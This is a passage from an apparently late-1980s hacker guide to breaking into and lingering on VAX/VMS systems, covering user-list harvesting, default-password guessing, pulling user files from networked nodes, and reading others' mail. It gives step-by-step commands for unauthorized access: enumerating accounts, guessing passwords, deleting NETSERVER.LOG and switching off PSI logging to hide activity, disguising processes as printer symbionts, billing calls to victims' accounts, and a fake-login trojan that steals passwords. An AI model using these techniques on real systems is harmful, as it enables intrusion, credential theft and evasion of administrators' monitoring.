  858. an excerpt out of the 'VAX/VMS internals and data structures' manual:
  859.  
  860.  
  861. If a process wishes a privilege that is not in its authorized list, one of two
  862. conditions must hold or the requested privilege is not granted.
  863.  
  864. 1)The process must have SETPRV privilege.  A process with this privilege can
  865.   acquire any other privilege with either the set privilege system service or
  866.   DCL command SET PROCESS/PRIVILEGES.
  867.  
  868. 2)The system service was called from executive or kernal mode. This mechanism
  869.   is an escape that allows either VMS or user-written system services to
  870.   acquire whatever privileges they need without regard for whether the calling
  871.   process has SETPRV privilege.  Such procedures must disable privileges
  872.   granted in this fashion as part of their return path.
  873.  
  874.  
  875. That should give you an idea of what is necessary to go about writing a program
  876. that grants you extra privileges.  For those advanced programmers, here is the
  877. relevant information:
  878.  
  879.  
  880.  
  881. Symbolic name   Location           Usage                          Referenced By
  882. ---------------+------------------+------------------------------+-------------
  883. PHD$Q_PRIVMSK  !process header    !working privilege mask        !system srvc's
  884. PCB$Q_PRIV     !PCB               !same as phd$q_privmsk         !device driver
  885. CTL$GQ_PROCPRIV!P1 Pointer page   !permanently enabled privs     !SET UIC
  886. PHD$Q_AUTHPRIV !process header    !procs allowable privs         !$setprv
  887. PHD$Q_IMAGPRIV !process header    !mask for enhanced priv images !$setprv
  888. UAF$Q_PRIV     !sysuaf.dat        !UAF allowable privs           !LOGINOUT
  889. KFI$Q_PROCPRIV !priv install image!image installed with privs    !image actvatr
  890. IHD$Q_PRIVREQS !image header      !unused - set for all privs!   !image actvatr
  891. ---------------+------------------+------------------------------+-------------
  892.  
  893.  
  894.  
  895. ONLINE SECURITY
  896. ---------------
  897.  
  898. Version 4.2 of VMS introduced the security auditing features.  These features
  899. can be used to track down hackers and illegal use of the machine. Things such
  900. as access to files, login failures, process creation, adding users etc can all
  901. be monitored and logged.  After you have logged into an unknown system, it is
  902. wise to check what kind of security they have enabled on the system. This is
  903. done in two ways. First you should try:
  904.  
  905. $show accounting
  906.  
  907. Normally this will either say accounting is disabled or will have a list of
  908. items that are being monitored.  This is used mainly for charging the users for
  909. CPU time etc.  What you should check for in this list is if IMAGE accounting
  910. is enabled.  If it isn't, then you can relax. If it is, you know that you have
  911. a smart system manager here and you will have to take extra precautions when
  912. fiddling around on this machine.  The second thing you should check is the
  913. actual level of security enabled.  Generally this feature is disabled, and you
  914. have nothing to worry about. To see the security type:
  915.  
  916. $show audit
  917.  
  918. One thing to note is that you must have the SECURITY privilege to issue this
  919. command. An especially secure system may have things such as breakins, logins,
  920. logfailures, file access (both successes and failures),and authorization
  921. checks.  These systems require a tremendous amount of care, and are not a good
  922. place to start learning about VMS.
  923.  
  924. Another important thing that you should keep in mind is that VAX/VMS stores
  925. information about login failures (invalid password, account expired, unknown
  926. username).  A security manager can identify possible breakin attempts by using:
  927.  
  928. $show intrusion/type=intruder
  929.  
  930. This command requires the CMKRNL and SECURITY privileges.  An interesting thing
  931. to note is that the system manager can have the VAX do certain things after it
  932. has determined that the user trying to log in is not legitimate.  For example
  933. it can block all login attempts from a certain terminal, or it could turn off
  934. accepting passwords for a certain account for a specified period of time. So
  935. lets suppose you were hacking an account and after 10 tries actually entered
  936. the right password.  If the intrusion alert is set at 5 tries, then even if you
  937. enter the correct password, it wont let you in!!
  938.  
  939.  
  940. EXPIRED PASSWORDS
  941. -----------------
  942.  
  943. I want to make a quick note here about expired passwords.  Often you will find
  944. after logging into an account that it will say that your password has expired
  945. and for you to enter a new password.  At this point you should check when was
  946. the last date of access. If it was only a few days ago, then you should forget
  947. about this account.  If it more than a few weeks ago, then you have found your-
  948. self an INACTIVE account (ie one that is not in use anymore)  The first thing
  949. that you should do is set a new password. For example:
  950.  
  951. $set password
  952.  
  953. Passwords can be from 1-31 characters in length and can contain the following
  954. characters:
  955.  
  956. A-Z
  957. a-z
  958. 0-9
  959. $ (dollar sign)
  960. _ (underscore)
  961.  
  962. Note that uppercase, and lowercase are not differentiated (unlike UNIX).  The
  963. reason that you should enter a password at this point is that if you don't, the
  964. next time the account will not let you log in since the password has expired.
  965.  
  966.  
  967.  
  968.  
  969. GAINING MORE ACCOUNTS
  970. ---------------------
  971.  
  972. Once you have managed to hack onto a VAX, often you will want to gain more
  973. accounts on the system.  There are several ways to go about doing this.  The
  974. first way is to get a list of all the users on the system.  Remember that the
  975. default password for any account is the same as the username. Well if you have
  976. a list of users, theres a good chance you may find a few who haven't bothered
  977. to change their passwords.  There are a few methods of viewing the userlist.
  978. The simplest, but least readable way is to:
  979.  
  980. $type sys$system:rightslist.dat
  981.  
  982. and buffer the incoming information. You will notice some garbage characters
  983. also sent through.  The way this file is set up is a 1-2 byte character ID
  984. followed immediately by a 32 byte string with the username.  So to pick out the
  985. usernames, simply ignore the first character from each name, and then you have
  986. the usernames. There is one small problem to this. Sometimes the character ID
  987. in front of the name is a SPACE.  In this case, you would still skip the first
  988. character (which is a space), but in viewing the name you would take all the
  989. characters.  So you just have to use your judgement when looking at this list
  990. to determine whether the string is the whole name, or whether it has an ID
  991. code stuck in the beginning. The problem is that the ID code is not necessarily
  992. a garbage character, it could be any valid ascii character (spaces,letters,
  993. numbers etc)  The thing that you should keep in mind is that these ID codes are
  994. grouped together, so you may see several names that all start with 'A' and you
  995. can assume that this is the ID and not part of the actual name.
  996.   Another method which is a bit slower, but a lot neater is to use the DUMP
  997. command on the rightslist file:
  998.  
  999. $dump sys$system:rightslist.dat
  1000.  
  1001. This is quite useful, because it automatically strips away control characters,
  1002. and puts each name into a separate record which makes it easy to isolate the
  1003. proper login names.
  1004.  
  1005.   An alternative method is to run the psi$authorize file from the system dir.
  1006. To do this, type:
  1007.  
  1008. $mc psiauthorize
  1009.  
  1010. When you get the PSI-authorize prompt, type:
  1011.  
  1012. PSI-authorize> show /id *
  1013.  
  1014. This will list all the users on the system. The drawback to this method is that
  1015. the system that you are on, may have taken out the PSI utilities from the
  1016. system directory.  The PSI utilities are used mainly for remotely connecting
  1017. to other mainframes.
  1018.  A third method to get a listing of all the users is to go through the sysuaf
  1019. database.  On most accounts this is usually not possible , since most users do
  1020. NOT have read/write access to sysuaf.dat.  If you DO have access to this file
  1021. (ie you have readall or setprv etc) then you can run authorize:
  1022.  
  1023. $sd sys$system
  1024. $run authorize
  1025.  
  1026. Then when you get the UAF prompt, type:
  1027.  
  1028. UAF>show [*,*] /brief
  1029.  
  1030.  The added bonus of doing it this way is that you can also find out things such
  1031. as the users home directory, when was the last time they logged in, what their
  1032. privileges are etc.  Easy to isolate the good accounts on the system that you
  1033. may want to hack at. It should be noted however, that if you CAN perform this
  1034. command, then you also have the priv's to create your own user, or better yet
  1035. change the password on an inactive account.
  1036.  There is another possibility that sometimes works on many systems.  Often, the
  1037. system manager uses the LIST command from AUTHORIZE and what it does is produce
  1038. a user listing in the file called: SYSUAF.LIS in the SYS$SYSTEM directory. If
  1039. he has done this, unless he explicitly changes the protection on the file, this
  1040. file has WORLD READ access.  In other words, anyone can go in and type out the
  1041. file. To do this try:
  1042.  
  1043. $type sys$system:sysuaf.lis
  1044.  
  1045.    Ok so lets assume that you have used one of these methods and have come up
  1046. with a list of all the users on the system. Now comes the tedious part. What
  1047. you have to do is log back into the system, and try each of the names out. For
  1048. the password, enter the same thing as you did for the username.  This is a long
  1049. and boring process depending on how large the userbase is, but it usually
  1050. yields a few good accounts.
  1051.  
  1052.  Another interesting variation on this, is to get accounts on remote nodes that
  1053. are linked with your VAX.  To see other nodes that are accessible from your
  1054. VAX, type:
  1055.  
  1056. $show net
  1057.  
  1058. This will produce a listing like:
  1059.  
  1060.  
  1061.  
  1062. VAX/VMS Network Status for local node 2.161 NORTELCOM on 01-SEP-1989
  1063.  
  1064. The next hop to the nearest area router is node 2.62 BELCAN
  1065.  
  1066. Node                 Links     Cost    Hops   Next Hop to Node
  1067.  
  1068. 2.161 NORTELCOM        0         0      0     Local   ->  2.161 NORTELCOM
  1069. 2.6 JANUS              0         3      3     UNA-0   ->  2.6   JANUS
  1070. 2.2 LUMPY              0         9      5     UNA-0   ->  2.2   LUMPY
  1071. 2.3 SBSU               0         5      4     UNA-0   ->  2.3   SBSU
  1072. 2.4 AURORA             0         4      4     UNA-0   ->  2.4   AURORA
  1073.  
  1074.  Total of 5 nodes.
  1075.  
  1076.  
  1077. This is a sample output that you would see on your screen.  Let me give a brief
  1078. explanation of what each column means.  The first column shows the node address
  1079. and the NodeName.  The node name is the most important to the VAX hacker since
  1080. that is how you will be contacting the remote node.  LINKS shows the number of
  1081. logical links between the local node and each available remote node. COST shows
  1082. the total line cost of the path to a remote node.  HOPS shows the number of
  1083. intermittent nodes plus the target node.  NEXT HOP TO NODE shows the outgoing
  1084. physical line used to reach the remote node.
  1085.  
  1086. The important item from this list of course is the node name. By referencing
  1087. this you can connect to other nodes.  A nice technique that allows you to get
  1088. user accounts on other nodes without actually having access to the node employs
  1089. this idea. For example, if you want to find out the user list of a node SBSU,
  1090. you could type:
  1091.  
  1092. $copy sbsu::sys$system:rightslist.dat sys$login
  1093.  
  1094. This will then transfer the rightslist from the other node to your login
  1095. directory, giving you a list of all the users on the other system that you can
  1096. hack out.
  1097.  
  1098. It should be noted that copying files from another node will create a file
  1099. on the remote node indicating your transfer.  To get rid of this, log onto the
  1100. remote node and delete the file called NETSERVER.LOG   (just delete the file
  1101. versions that you have created, and leave the others alone!)
  1102.  
  1103. There is another useful trick that sometimes yields more USER accounts on other
  1104. systems.  Try typing:
  1105.  
  1106. $show logical
  1107.  
  1108. This will present you with a giant list of what seem like symbol equates. What
  1109. you should look for in here is something that accesses a file in another system
  1110. eg.
  1111.  
  1112. "mainuaf"=sbsu::sys$system:sysuaf.dat
  1113.  
  1114. Many times, a user/password combination is hidden among these definitions. To
  1115. find these, simply search the file for occurrences where they have a nodename
  1116. such as SBSU followed by a quote and some info. An example:
  1117.  
  1118. "mainuaf"=sbsu"system manager"::sys$system:sysuaf.dat
  1119.  
  1120. The important part is the info in quotes after the node name. The first item
  1121. (before the space) is a username, and the word after the space is the password.
  1122. It is rare to find such an occurrence, but it should not be overlooked, since
  1123. it can sometimes yield high system level accounts.  In this example, node SBSU
  1124. has a user called SYSTEM, who's password is MANAGER.
  1125.  
  1126.  
  1127.  
  1128. DECNET and PSI
  1129. --------------
  1130.  
  1131. If you do a SHOW NET and it gives you a list of other nodes, you can connect to
  1132. these nodes using the SET HOST command. For example to connect to node SBSU:
  1133.  
  1134. $set host sbsu
  1135.  
  1136. This will then connect you to SBSU, and you have to go through their login
  1137. procedure also.  An interesting trick to note is, lets suppose that you have
  1138. hacked an account out on node SBSU.  What you want to find out is the DATAPAC
  1139. or TELENET address of the machine.  To do this use:
  1140.  
  1141. $mc ncp tell sbsu sh known dte
  1142.  
  1143. This will then give you the address of the machine, so that you can call it
  1144. directly rather than through this VAX.  You may want to do this to increase
  1145. speed, since obviously calling through another VAX slows things down a bit.
  1146.  
  1147. Another method which often works is to use the SHOW LOGICAL command.  By
  1148. specifying a certain table, you can sometimes get a list of the NUAs of the
  1149. other nodes in the same cluster as your node.  To do this type:
  1150.  
  1151. $show logical/table=*psi*
  1152.  
  1153. An alternative method which is a bit messy and requires higher privileges is to
  1154. type out the NETCIRC.DAT file. ie:
  1155.  
  1156. $type sys$system:netcirc.dat
  1157.  
  1158. On all the systems that I have seen, none of them had WORLD READ access to this
  1159. file, so it is not possible to read this with just TMPMBX and NETMBX privileges.
  1160.  
  1161. Many times you will want to call a phone number to another machine. To do this
  1162. use:
  1163.  
  1164. $set host/dte txa0: /dial=number:5551212
  1165.  
  1166. This command will dial out to 555-1212 using the terminal TXA0:  To dial out a
  1167. phone number, you MUST specify a terminal that is hooked up to a modem.  To
  1168. find out which terminals have modems type:
  1169.  
  1170. $show device
  1171.  
  1172. This will give you a list of devices hooked up to the VAX. Devices are 4
  1173. character strings followed by a colon (:) The terminals that you can use are
  1174. usually further down the list.  To test the terminal for a modem, use the
  1175. following line, which also illustrates the importance of lexicals:
  1176.  
  1177. $write sys$output f$getdvi("txa0","tt_modem")
  1178.  
  1179. This above line would test the terminal TXA0: to see if it has a modem attached
  1180. If it responds with TRUE, then you have a modem, otherwise not. Note that you
  1181. must put the terminal name in quotes, and also that you DO NOT enter the colon.
  1182.  
  1183. If the VAX you have hacked onto is hooked up on a packet switching system such
  1184. as DATAPAC or TELENET, then there is another USEFUL thing you can perform. To
  1185. call out NUA's use the /X29 qualifier. For example:
  1186.  
  1187. $set host/x29 026245400050570
  1188.  
  1189. This would call up the NUA 026245400050570 (altos:tchh).  What is interesting
  1190. to note is that on many VAX's you can call out to foreign remote nodes such as
  1191. in the example and the charge for the collect call is placed to the account
  1192. through which you are logged in as.  This is a safe and easy method to call out
  1193. to PSDN's which are normally long distance from you.  It should be noted that
  1194. many system managers turn off foreign DNICs, which may limit you to calling
  1195. only within your local DNIC.
  1196.  One precaution you may want to take when using the SET HOST/X29 command is to
  1197. turn off logging.  Although this is usually turned off, some system managers
  1198. may buffer everything you type in and keep it in a file. To temporarily turn
  1199. the logging off, try this:
  1200.  
  1201. $run sys$system:psipad
  1202.  
  1203. It will then ask for NODE:  just hit RETURN, then:
  1204.  
  1205. PSI>show log_file
  1206.  
  1207. this will either say that buffering is off or it will give you a filename with
  1208. a directory path. If it is not off then make a note of the file, then type:
  1209.  
  1210. PSI>set nolog_file
  1211.  
  1212. This will turn off the buffering. After you are through with the remote session
  1213. be sure to turn it back on with:
  1214.  
  1215. PSI> set log_file xxxx:[xxxx.xxxx]xxxxx.xxx
  1216.  
  1217. All the xxx's represent the full filename path that you initially wrote down
  1218. when you did the SHOW LOG_FILE command.
  1219.  
  1220.  I want to point out another interesting trick that sometimes works on certain
  1221. accounts. Many a time i have encountered an account on a Vax which would simply
  1222. allow you to call out to another node. It had no other purpose, and would
  1223. refuse to give you DCL access.  If you encounter such an account and it asks
  1224. you to enter a nodename, try putting /x29 NUA.  This technique allows you to
  1225. dial out to remote systems via some PSS even though you do not have DCL access!
  1226. An example:
  1227.  
  1228. Enter nodename> /x29 026245400050570
  1229.  
  1230. If /X29 isn't disabled, this will allow you to call that NUA.
  1231.  
  1232. One thing to note is that not all systems allow you to call out using these
  1233. methods. Some have /x29 disabled, others have /dial disabled etc.  In order to
  1234. overcome this barrier, it is important to know which files are involved.  If
  1235. you want to dial out, you MUST have the modem files (such as DMCL). If you want
  1236. to dial out across a PSS, you must have the PSI utility files, and lastly if
  1237. you wish to dial out to another node in the cluster you must have RTPAD.EXE on
  1238. the local node and REMACP.EXE and RTTDRIVER.EXE on the remote node.
  1239.  
  1240. One quick note about finding other VAXes that have PSI utilities on them. Often
  1241. you may want to hack only those VAXes that have PSIPAD on them.  To determine
  1242. if a particular VAX in your cluster has the capability, issue the command:
  1243.  
  1244. $dir NODE::sys$system:psi*.*
  1245.  
  1246. NODE stands for the nodename that you want to check.  If this returns with a
  1247. message that no files match, then this particular VAX does not have PSI
  1248. installed.  If on the other hand it returns with several file names, then it
  1249. does have the PSI utilities installed.
  1250.  
  1251. This is just a VERY brief overview of the DECnet setup on VAX/VMS systems.  For
  1252. a more detailed analysis, look for my other file: 'Understanding DECnet and
  1253. NCP'
  1254.  
  1255.  
  1256.  
  1257. HIDING ON THE SYSTEM
  1258. --------------------
  1259.  
  1260. There are several methods that allow you to remain undetected once you have
  1261. hacked onto a VAX.  One of the most important things is to leave things as they
  1262. are, in other words, do not delete files or subdirectories.  You should also
  1263. avoid leaving suspicious looking COM or EXE files that you may have created.
  1264.  
  1265. An important ability to have is being able to hide from SHOW USER. There are
  1266. several ways of going about this, but the simplest is to become a
  1267. non-interactive process. Or to become a subprocess of some other
  1268. non-interactive process such as a BATCH or NETWORK process.  Although this will
  1269. hide you from SHOW USERS, you will still be visible if someone did a SHOW
  1270. SYSTEM. To get around this you should also specify your process name to a
  1271. printer driver or something. For example:
  1272.  
  1273. $show system
  1274.  
  1275. Look for the process that has a name of "SYMBIONT_xxxx" where xxxx is a number.
  1276. These are the printer drivers on the system.  Look for the last number on the
  1277. list and then change your own process to one higher than this number.  For
  1278. example if the last printer is 5 then type:
  1279.  
  1280. $set proc/name="SYMBIONT_0006"
  1281.  
  1282. At the end of this file i have enclosed a small 20 line assembler program that
  1283. you can enter through EDIT.  It allows you to hide from SHOW USER by changing
  1284. your process to an OTHER non-interactive process. After you assemble the file,
  1285. link it and then execute it using the RUN command. You should then copy this
  1286. file to some rarely used directory, where no one else will notice it.
  1287.  
  1288. OTHER PROCESSES
  1289. ---------------
  1290.  
  1291.   So you have hacked your way in, and everything is going smooth. Now you want
  1292. to find out what all the other people on the system are doing.  There are
  1293. several ways of finding out who else is using the system and what they are
  1294. doing. Here i will outline some of the basic methods.
  1295.   Perhaps the simplest command that you can issue to see who else is logged in
  1296. is the SHOW USER command.
  1297.  
  1298. $show user
  1299.  
  1300. a typical output might look like:
  1301.  
  1302.  
  1303.  
  1304.             VAX/VMS Interactive Users
  1305.               1-SEP-1989 12:48:51.14
  1306.  
  1307.        Total number of interactive users=5
  1308.  
  1309.    PID        Username    Process Name     Terminal
  1310.  
  1311. 202000B3      DELUCAJ     DELUCAJ          VTA21:      TTA7:
  1312. 204000C4      <login>     _vta13:          VTA13:      LTA8:
  1313. 20400138      OPERATOR    system monitor   VTA17:      OPA0:
  1314. 2040013D      POLLACK     POLLACK          VTA11:      TTB0:
  1315. 204000BC      ENTITY      FUK YOO          VTA15:      TTA1:
  1316.  
  1317.  
  1318. Ok so what does all this mean?! Well lets go one column at a time. The first
  1319. column gives you your process identification number. This is a unique number
  1320. that is assigned to each process as it logs in.  The number itself really
  1321. doesn't matter, however it is required for certain commands.  The next column
  1322. is the username of the process. This always puts the name of the account that
  1323. you logged in with.  Sometimes you may notice that instead of a name it says
  1324. <login>   This indicates that someone is currently going through the login
  1325. procedures under that PID.  The next column is the process name. This is
  1326. defaulted to be the same as your username, but can easily be changed. For
  1327. example:
  1328.  
  1329. $set proc/name="Hacker!"
  1330.  
  1331. This will set your process name to Hacker!  Since everybody will see this when
  1332. they do a SHOW USER command, it is not recommended that you choose something
  1333. that will give you away. In general, you leave this as the default.  The next
  1334. column shows the virtual terminal that you are logged into.  The last column
  1335. shows the physical terminal that you are logged into. It is important to check
  1336. this last column.  You should check to make sure that nobody is logged in under
  1337. OPA0:  Anyone logged in under this is using the system console, which means
  1338. that they could possibly be watching you!  Another one to note is RTxx: which
  1339. indicates a process that is remotely logged in (ie calling in from another
  1340. VAX or something)  Other things that you should watch out for are users who are
  1341. logged in under the SYSTEM account or any other high-privileged accounts.  Any
  1342. one of OPERATOR,OPER,SYSTEM,SYSMGR etc could mean trouble for the hacker.
  1343.  
  1344.  One thing that you may notice on some systems is that a process will be logged
  1345. on ALL the time under the OPA0: terminal.  What's going on?! Is the system
  1346. manager there all the time?  No. What happens on many systems is that the
  1347. system manager logs into his terminal, and doesn't bother logging out at the
  1348. end of the day, leaving his process running often for weeks at a time.  There
  1349. is no easy way to know if the guy is really there or not.  There are two things
  1350. you can do. One is to check the time that the account has been IDLE, but there
  1351. is no easy way to check this without going into some programming.  The next
  1352. best you can do is issue the SHOW SYSTEM command.  This will show all the
  1353. processes currently running, their priority levels, how much CPU time they are
  1354. eating up etc. A typical report may look like:
  1355.  
  1356. $show system
  1357.  
  1358. VAX/VMS X2EN  on node DELPHI  01-SEP-1989 15:10:31.02   Uptime   0 12:06:30
  1359.  
  1360.   Pid      Process Name   State  Pri     I/O      CPU        Page flts  Ph. Mem
  1361.  
  1362. 22200080   NULL           COM    0         0    0 16:34:12.00        0        0
  1363. 22200088   SWAPPER        HIB    16        0    0 00:03:52.53        0        0
  1364. 22200113   ENTITY         LEF    4     16505    0 00:00:12.02     8689      233
  1365.  
  1366.                                :
  1367.                                :
  1368.                                :
  1369.                                :
  1370.  
  1371.                             etc etc
  1372.  
  1373.  
  1374.  
  1375. This display can give you several important pieces of information about other
  1376. processes. The explanation of each column:
  1377.  
  1378. PID       - the process identification number
  1379. Proc Name - the name of the process. Note that certain non-interactive system
  1380.             processes such as NULL, SWAPPER, ERRFMT etc are always running in
  1381.             background.
  1382. STATE     - This is important.  This tells you what the process is currently
  1383.             doing.  HIB-hibernating, COM-computing, LEF-active, CUR- current
  1384. PRIORITY  - the higher the priority number, the higher priority it has in terms
  1385.             of accessing CPU time.
  1386. I/O       - Shows the accumulation of the direct I/O and buffered I/O
  1387. CPU       - the total amount of CPU time the process has used so far
  1388. PAGE FLTS - page faults, number of exceptions generated. Not very useful...
  1389. PH. MEM   - amount of physical memory that the process occupies
  1390.  
  1391. A further thing you may notice after the last column on some processes is a
  1392. single letter. This is the process indicator, and it can be one of:
  1393.  
  1394. B - batch job
  1395. S - subprocess
  1396. N - network process
  1397.  
  1398.  
  1399. Another useful option is the ability to know which files, each of the processes
  1400. are accessing. To accomplish this type:
  1401.  
  1402. $show devices/files/nosystem
  1403.  
  1404. The only problem with this command is that it will not show the filename if you
  1405. do not have read access to it. (or the BYPASS privilege)
  1406.  
  1407. Perhaps the most POWERFUL tool that the VAX/VMS hacker has is the System Dump
  1408. Analyzer (SDA).  An important option of this allows you to view all the process
  1409. running on the system, what files they are accessing, their process status,
  1410. the contents of their virtual memory (such as keyboard buffer) etc etc  A VERY
  1411. powerful command, it is started with the command:
  1412.  
  1413. $analyze/system
  1414.  
  1415. The only drawback with this command is that it requires the CMKRNL privilege.
  1416. I will discuss this feature in more detail later in the file.
  1417.  
  1418.  
  1419.  
  1420. DETACHED ACCOUNTS
  1421. -----------------
  1422.  
  1423. A very big security loophole which is allowed on many VMS systems are detached
  1424. accounts.  Basically what this allows you to do is cut carrier instead of
  1425. logging out properly.  Instead of logging the process out, it is left waiting
  1426. on the system.  The next user who logs in, instead of getting a Username prompt
  1427. will get your shell ($) prompt!  There are many useful things you can do with
  1428. a detached account.  The most obvious use of course is to set up a Trojan Horse
  1429. program. Basically you write a procedure that simulates the VAX/VMS login
  1430. sequence.  After the user enters his/her username-password, you save this info
  1431. to a file, give him a 'User authorization failure' and throw him into the real
  1432. login sequence.  He will think he mistyped something and this time when he
  1433. tries, he will be able to log in normally. But in the meantime, you have a copy
  1434. of his username/password combination stored away in a file, which you can later
  1435. use!
  1436.  
  1437.  
  1438.  
  1439. EXAMINING FILES
  1440. ---------------
  1441.  
  1442. Often it becomes necessary to examine a file in greater detail than provided by
  1443. a simple TYPE command.  For executable and object files there is of course the
  1444. ANALYZE/IMAGE and ANALYZE/OBJECT commands, but often you want to have a look at
  1445. each individual byte in the file.  The best way to do this is to use the DUMP
  1446. command.  An example:
  1447.  
  1448.  
  1449. $dump test.dat
  1450.  
  1451.  
  1452. DUMP of file DISK0:[NORMAN]test.dat  on  15-APR-1989  15:43:26.08
  1453. File ID (3134,818,2)   End of file block 1 / Allocated 3
  1454.  
  1455. Virtual block number 1 (00000001), 512 (0200) bytes
  1456.  
  1457. 706d6173 20612073 69207369 68540033 3.This is a samp 000000
  1458. 73752065 62206f74 20656c69 6620656c le file to be us 000010
  1459. 61786520 504d5544 2061206e 69206465 ed in a DUMP exa 000020
  1460. 00000000 00000000 0000002e 656c706d mple............ 000030
  1461. 00000000 00000000 00000000 00000000 ................ 000040
  1462.  
  1463.                      :
  1464.                      :
  1465.                      :
  1466.  
  1467. 00000000 00000000 00000000 00000000 ................ 0001E0
  1468. 00000000 00000000 00000000 00000000 ................ 0001F0
  1469.  
  1470.  
  1471. As you can see, this not only shows the ASCII interpretation, but also the HEX
  1472. value for each byte.  This can be VERY valuable in certain situations.  You
  1473. should note that since the default is HEXADECIMAL LONGWORD, the bytes seem to
  1474. be in a backwords order.  This is due to the way the machine stores numbers in
  1475. memory: Lo-byte,LSB,MSB,Hi-byte.  You can optionally specify the numbers to
  1476. come out in decimal or also in single byte format.  Example:
  1477.  
  1478. $dump sbsu::sys$system:rightslist.dat /byte/header/decimal
  1479.  
  1480. See the online HELP files for more detail into the various qualifiers. You
  1481. should note that you CAN use dump to access files on OTHER nodes!
  1482.  
  1483.  
  1484. CREATING TEXT FILES
  1485. -------------------
  1486.  
  1487.   This isn't the best of places to put this topic, but if I don't do it now, I
  1488. will probably forget later on, so here goes...
  1489.   Often you will need to create files on a system, such as messages to other
  1490. hackers, notes to yourself, small DCL programs etc. The basic method is as
  1491. follows:
  1492.  
  1493. $create file.txt
  1494.  
  1495.    Hi this is a dumb message that i am typing just to
  1496.    see how this command works.
  1497.  
  1498.    <CTRL-Z>
  1499.  
  1500. $
  1501.  
  1502. Basically what is happening here is you specify a filename and an extension
  1503. when using the CREATE command (in this case file.txt) and then the system waits
  1504. there for you to type in something.  At this point you can type whatever you
  1505. want, and to end the message/program/memo just hit CTRL-Z. This will return you
  1506. to the DCL prompt.  This is an easy method to transmit COM files that you have
  1507. either created or buffered from some other system.  Just issue the CREATE
  1508. command, send the file through your buffer, then hit CTRL-Z to finish it off.
  1509.  
  1510.  
  1511.  
  1512. VAX/VMS MAIL SYSTEM
  1513. -------------------
  1514.  
  1515.   Although it is not a good idea to use the MAIL system to send or receive
  1516. messages (since the messages can be read by anyone with enough privs) I will
  1517. present a brief list of what it can do.  One important thing to note is that
  1518. whenever there are MAIL messages waiting to be read, they are stored in a file
  1519. that ends with the MAI extension.  So if the account you have logged into has
  1520. received mail, and you really want to read it for some reason, then you can do
  1521. the following from DCL:
  1522.  
  1523. $type mail.mai
  1524.  
  1525. This file is not necessarily called MAIL.MAI, it could be any other name with
  1526. a MAI extension.  Aside from some header information stored at the beginning
  1527. of each message, the rest of the message is mostly in standard ASCII and easily
  1528. readable.  Doing it this way ensures that the message remains there for the
  1529. REAL user when he logs in. (after a message has been read, it is put into
  1530. another area, and the user will not see it.  This could make him suspicious if
  1531. he keeps losing important mail messages!)
  1532.   Reading MAIL files can be quite useful, because sometimes important messages
  1533. are stored here.  Like i stated earlier, you shouldn't be actually using MAIL
  1534. to read the mail since it will then get deleted, and the actual user will
  1535. eventually notice.  Also, you shouldn't use the MAIL system to send
  1536. hacker-related information (to other hackers) because system managers can
  1537. access your mail and read what you have to say.
  1538.   Basically you can use the MAIL facility in two ways: Interactively and
  1539. through the shell.  For ease of use I will only describe the interactive method
  1540. since it is easier and more flexible.  If you insist on doing it from the
  1541. shell, then just call up the ONLINE HELP for the qualifiers.  In any case, to
  1542. interactively use the MAIL utility type:
  1543.  
  1544. $mail
  1545.  
  1546. This will respond with the prompt:
  1547.  
  1548. MAIL>
  1549.  
  1550. At this point you can enter the various mail commands.  Following is a brief
  1551. overview of the more important commands and concepts.  At the end, I have
  1552. provided a table with all the possible commands that can be entered here.
  1553.  
  1554.  
  1555.  
  1556. Heres a brief list of the more important MAIL commands that I will discuss here
  1557.  
  1558.  
  1559.          SEND        DIRECTORY     EXTRACT
  1560.          READ[/NEW]  DELETE        PRINT
  1561.          FORWARD     MOVE          HELP
  1562.          REPLY       SELECT        EXIT
  1563.  
  1564. The first command to try is the SEND command.  Try sending a message to
  1565. yourself Enter the SEND command and press RETURN.  Enter your own user name at
  1566. the prompt and press RETURN.  Enter a subject at the prompt and press RETURN
  1567. again. The following example shows how to use the SEND command:
  1568.  
  1569. MAIL> SEND
  1570. To:PIERCE
  1571. Subj:Sailing
  1572. Enter your message below.  Press CTRL-Z when complete, or CTRL-C to quit:
  1573.  
  1574. When you finish entering the text of your message, press CTRL-Z. Because you
  1575. are sending the message to yourself, MAIL signals that you have just received a
  1576. new message by displaying the following message:
  1577.  
  1578. New mail on node FLAXEN from PIERCE
  1579.  
  1580. MAIL>
  1581.  
  1582. Now, you are ready to use the READ command.  To read the message you just sent
  1583. to yourself, enter the READ command with the /NEW qualifier and press RETURN as
  1584. follows:
  1585.  
  1586. MAIL> READ/NEW
  1587.  
  1588. You must specify the /NEW qualifier with the READ command when you want to read
  1589. new mail that arrives while you are in the Mail Utility.  When you are not in
  1590. the Mail Utility and you receive new mail, invoke MAIL to read the new message,
  1591. you can enter the READ command without the /NEW qualifier.  Or, if you wish to
  1592. read mail that you have already read, you can enter the READ command.
  1593.  
  1594. You can forward a copy of a mail message to another user by entering the
  1595. FORWARD command.  MAIL prompts you for the name of the user to receive the
  1596. message. Try forwarding a copy of the message you just received back to
  1597. yourself. Enter your own user name and press RETURN.  Supply a subject when
  1598. prompted and press RETURN MAIL signals that you have just received a new
  1599. message. Enter the READ/NEW command to read the forwarded message.
  1600.  
  1601. When you receive a message and want to respond to it, enter the REPLY command
  1602. and press RETURN.  MAIL displays the header information as follows:
  1603.  
  1604. MAIL> REPLY
  1605. To:FLAXEN::PIERCE
  1606. Subj:RE: Using the REPLY command
  1607. Enter your message below.  Press CTRL-Z when complete, or CTRL-C to quit:
  1608.  
  1609. When you finish typing your response, press CTRL-Z.  Again, MAIL signals that
  1610. you have just received a new message.  To read the message, enter the READ/NEW
  1611. command.
  1612.  
  1613. When you want to see a list of all the mail messages you have collected, enter
  1614. the DIRECTORY command and press RETURN.  MAIL displays a list like the
  1615. following:
  1616.  
  1617.          # From             Date                  Subject
  1618.  
  1619.          1 FORBES           1-SEP-1989            How to Write a Memo
  1620.          2 SBSU::BERT       2-SEP-1989            Using the Printer
  1621.          3 FROST::BASTIEN   4-SEP-1989            Chicken Kiev
  1622.  
  1623.  
  1624. When you want to remove a message, use the DELETE command.  You can either
  1625. enter the DELETE command while you are reading the message or you can enter the
  1626. DELETE command followed by the number of the message you want to remove.  To
  1627. remove the second message in the list, enter the following command line:
  1628.  
  1629. MAIL> DELETE 2
  1630.  
  1631. If you enter the DIRECTORY command after you have deleted a message (or
  1632. messages), you see the messages marked for deletion, as follows:
  1633.  
  1634.          # From             Date                  Subject
  1635.  
  1636.          1 FORBES           1-SEP-1989            How to Write a Memo
  1637.          2 (Deleted)
  1638.          3 FROST::BASTIEN   4-SEP-1989            Chicken Kiev
  1639.  
  1640.  
  1641. When you exit from MAIL, the messages marked for deletion disappear.
